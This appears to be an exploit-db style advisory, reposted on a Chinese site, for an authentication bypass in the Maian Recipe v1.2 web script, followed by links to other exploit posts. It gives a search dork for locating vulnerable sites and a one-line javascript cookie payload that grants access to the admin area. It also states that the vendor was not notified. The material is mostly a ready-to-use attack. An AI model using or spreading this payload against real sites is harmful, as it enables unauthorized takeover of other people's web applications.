-[*] ================================================================================ [*]-
-[*] Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Recipe v1.2
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie
exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "recipe_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
【Maian Recipe】相关文章:
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ MS Internet Explorer (FTP Server Response) DoS Exploit
★ PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
★ Maian Music 1.0 Insecure Cookie Handling Vulnerability
★ Joomla Component DT Register Remote SQL injection Vulnerability
★ Mole Group Last Minute Script
★ minb 0.1.0 Remote Code Execution Exploit
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit